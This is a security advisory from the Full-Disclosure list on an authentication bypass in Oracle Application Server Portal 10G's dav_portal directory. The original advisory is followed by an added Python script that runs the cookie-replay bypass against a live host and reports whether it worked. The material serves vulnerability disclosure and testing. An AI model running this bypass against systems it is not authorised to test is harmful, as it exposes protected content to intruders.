[Full-disclosure] Oracle Application Server 10G ORA_DAV Basic Authentication Bypass Vulnerability

Affected Software/Device: Oracle Application Server Portal

Vulnerability: Authentication Bypass

Tested Version: 10G

Risk: Medium

Description:

Oracle Application Server Portal (OracleAS Portal) is a Web-based
application for building and deploying portals. It provides a secure,
manageable environment for accessing and interacting with enterprise
software services and information resources.

The /dav_portal/portal/ directory is initially protected with HTTP Basic
authentication. It is possible to bypass this and access the contents of
dav_portal by adding a specially crafted cookie value to the HTTP
request header.

Sample Request:

To construct the special HTTP request, first visit the URL
"http://site/pls/portal/%0A". The response to this request sets a
special session id in a cookie. Subsequent requests to
"http://site/dav_portal/portal/" that carry this cookie reveal the
contents of the directory without any authentication.
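The following script is an added example, not part of the original advisory, that turns the two-step sequence above into a repeatable check: it requests /dav_portal/portal/ anonymously, seeds a session by requesting /pls/portal/%0A, replays every cookie the server set, and compares the two results. Only the two paths and the order of requests come from the advisory; the function names, the verdict labels, the default port 7777 (a common OracleAS HTTP listener port, assumed here) and the headers used in the offline demo are assumptions of this example. The cookie name is not given in the advisory, so the script forwards whatever the server sets rather than guessing it.

```python
"""Check whether an OracleAS Portal host is exposed to the ORA_DAV basic
authentication bypass described in the advisory above.

The two-step sequence (GET /pls/portal/%0A to obtain a session cookie, then
GET /dav_portal/portal/ replaying that cookie) is taken from the advisory;
everything else here (function names, host/port arguments, verdict labels,
and the constructed headers in the demo) is an assumption of this example.
"""
import http.client
import sys

SEED_PATH = "/pls/portal/%0A"           # issues the session cookie, per the advisory
PROTECTED_PATH = "/dav_portal/portal/"  # normally behind HTTP Basic authentication


def extract_cookies(set_cookie_values):
    """Turn a list of raw Set-Cookie header values into {name: value}.

    Attributes such as path= and expires= are dropped; only the leading
    name=value pair of each header is kept.
    """
    cookies = {}
    for raw in set_cookie_values:
        first = raw.split(";", 1)[0].strip()
        if "=" not in first:
            continue
        name, value = first.split("=", 1)
        cookies[name.strip()] = value.strip()
    return cookies


def cookie_header(cookies):
    """Serialise {name: value} into a single Cookie request header value."""
    return "; ".join(f"{n}={v}" for n, v in cookies.items())


def classify(status_anonymous, status_with_cookie):
    """Compare the responses for PROTECTED_PATH without and with the seeded cookie.

    bypass          - Basic auth challenge without the cookie, content with it
    protected       - challenge both times (not affected, or cookie ineffective)
    unauthenticated - no challenge even without the cookie (misconfiguration,
                      not this bug)
    inconclusive    - anything else (redirects, errors, WAF responses)
    """
    if status_anonymous == 401 and status_with_cookie in (200, 207):
        return "bypass"
    if status_anonymous == 401 and status_with_cookie == 401:
        return "protected"
    if status_anonymous in (200, 207):
        return "unauthenticated"
    return "inconclusive"


def fetch(host, port, path, headers=None, use_tls=False, timeout=10):
    """Single GET against a live host; returns (status, [Set-Cookie values])."""
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers=headers or {})
        resp = conn.getresponse()
        resp.read()
        # getheader("Set-Cookie") would join several cookies with commas,
        # which breaks on expires= dates; get_all() keeps them separate.
        return resp.status, resp.msg.get_all("Set-Cookie") or []
    finally:
        conn.close()


def check_host(host, port=7777, use_tls=False):
    """Run the full sequence against a live host and return the verdict."""
    status_anon, _ = fetch(host, port, PROTECTED_PATH, use_tls=use_tls)
    _, set_cookies = fetch(host, port, SEED_PATH, use_tls=use_tls)
    cookies = extract_cookies(set_cookies)
    if not cookies:
        return "inconclusive"  # server set nothing we could replay
    status_cookie, _ = fetch(host, port, PROTECTED_PATH,
                             headers={"Cookie": cookie_header(cookies)},
                             use_tls=use_tls)
    return classify(status_anon, status_cookie)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check_host(sys.argv[1]))
    else:
        # Offline demo on constructed headers, not captured from a real server.
        demo = extract_cookies(["session=EXAMPLEVALUE; path=/; HttpOnly"])
        print(cookie_header(demo), classify(401, 200))
```

Run it as `python check_ora_dav.py portal.example.internal` against a host you are authorised to test. A "bypass" verdict reproduces the advisory; "protected" means the cookie had no effect; "unauthenticated" means the directory was never behind Basic authentication in the first place, which is a separate misconfiguration and not the behaviour this advisory describes.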

Deniz CEVIK
www.intellectpro.com.tr

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/